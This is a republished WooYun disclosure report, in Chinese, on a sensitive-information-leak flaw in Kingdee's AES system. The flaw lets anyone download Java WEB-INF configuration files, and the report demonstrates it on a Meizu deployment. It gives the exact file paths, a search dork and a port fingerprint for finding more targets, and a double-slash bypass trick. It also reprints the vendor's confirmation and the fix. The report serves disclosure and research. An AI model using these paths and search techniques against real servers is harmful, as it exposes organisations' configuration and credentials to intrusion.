金蝶AES系统Java web配置文件可下载

admin
admin
admin
145391
文章
119
评论
2015年8月10日22:40:37评论353 views字数 204阅读0分40秒阅读模式
摘要

2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-21: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-01-12: 细节向核心白帽子及相关领域专家公开
2015-01-22: 细节向普通白帽子公开
2015-02-01: 细节向实习白帽子公开
2015-02-12: 细节向公众公开

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2014-83323

漏洞标题: 金蝶AES系统Java web配置文件可下载 金蝶AES系统Java web配置文件可下载

相关厂商: 金蝶

漏洞作者: lijiejie金蝶AES系统Java web配置文件可下载

提交时间: 2014-11-14 22:18

公开时间: 2015-02-12 22:20

漏洞类型: 敏感信息泄露

危害等级: 中

自评Rank: 6

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

6人收藏

漏洞详情

披露状态:

2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-21: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-01-12: 细节向核心白帽子及相关领域专家公开
2015-01-22: 细节向普通白帽子公开
2015-02-01: 细节向实习白帽子公开
2015-02-12: 细节向公众公开

简要描述:

金蝶AES系统Java web配置文件可任意下载。

详细说明:

金蝶AES系统 Java web配置文件可随意下载:

魅族的系统示范:

code 区域 
**.**.**.**/portal/WEB-INF/web.xml
 **.**.**.**/portal/WEB-INF/config/pluto/pluto-portal-driver-services-config.xml
 **.**.**.**/portal/WEB-INF/config/spring/applicationContext-basic.xml
 **.**.**.**/portal/WEB-INF/config/spring/applicationContext-datasource.xml
 **.**.**.**/portal//WEB-INF/config/spring/applicationContext-frame.xml
 **.**.**.**/portal//WEB-INF/config/spring/applicationContext-pub.xml
 **.**.**.**/portal//WEB-INF/config/spring/applicationContext-perm.xml
 **.**.**.**/portal//WEB-INF/config/spring/applicationContext-setting.xml
 **.**.**.**/portal//WEB-INF/config/spring/applicationContext-page.xml
 **.**.**.**/portal/WEB-INF/config/spring/applicationContext-personal.xml
 **.**.**.**/portal//WEB-INF/config/spring/applicationContext-portlet.xml
 **.**.**.**/portal/WEB-INF/config/spring/applicationContext-weibo.xml
 **.**.**.**/portal//WEB-INF/config/spring/applicationContext-report.xml
 **.**.**.**/portal//WEB-INF/config/spring/applicationContext-sms.xml
 **.**.**.**/portal/WEB-INF/sso/applicationContext-ssoClient.xml

eassso下的配置文件:

code 区域 
**.**.**.**/eassso//WEB-INF/web.xml
 **.**.**.**/eassso//WEB-INF/applicationContext.xml
 **.**.**.**/easssoWEB-INF/deployerConfigContext.xml

漏洞证明:

读取数据源配置 **.**.**.**/portal/WEB-INF/config/spring/applicationContext-datasource.xml, 得到:

code 区域 
<beans default-lazy-init="true" default-autowire="no" default-dependency-check="none">
   <bean id="dataSource" class="com.kingdee.portal.biz.core.datacenter.KDPortalDataSource">
     <property name="dataSource">
       <ref bean="MZROS" />
     </property>
   </bean>
   <bean id="MZROS" class="org.springframework.jndi.JndiObjectFactoryBean">
     <property name="jndiName" value="jdbc/MZROS" />
   </bean>
 </beans>

检索关键字: inurl:/eassso/ 可以找到了同类系统,以下地址手工验证存在漏洞(该系统较多监听6888端口,可以根据这个特征定位),若一个斜杠下载不成功,可尝试加双斜杠:

http://**.**.**.**/portal/WEB-INF/web.xml

http://**.**.**.**/portal/WEB-INF/web.xml

http://**.**.**.**/portal/WEB-INF/web.xml

http://**.**.**.**/portal/WEB-INF/web.xml

http://**.**.**.**:7888/eassso//WEB-INF/web.xml

http://**.**.**.**:8080/eassso//WEB-INF/web.xml

**.**.**.**/eassso//WEB-INF/web.xml

**.**.**.**/eassso//WEB-INF/web.xml

**.**.**.**/eassso//WEB-INF/web.xml

**.**.**.**:8080/eassso//WEB-INF/web.xml

http://**.**.**.**/eassso//WEB-INF/web.xml

**.**.**.**/eassso//WEB-INF/web.xml

**.**.**.**:8080/eassso//WEB-INF/web.xml

http://**.**.**.**/eassso//WEB-INF/web.xml

**.**.**.**:6888/eassso//WEB-INF/web.xml

http://**.**.**.**/eassso//WEB-INF/web.xml

**.**.**.**/eassso//WEB-INF/web.xml

**.**.**.**/eassso//WEB-INF/web.xml

修复方案:

禁止通过web访问

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-11-18 08:32

厂商回复:

感谢关注金蝶信息安全,已经在处理中。谢谢!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2015-02-13 10:00 | LoveSnow ( 实习白帽子 | Rank:85 漏洞数:20 | 以正和,以奇胜!)

    0

    李姐出品,必为精品!求带我飞,哈哈!@lijiejie

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin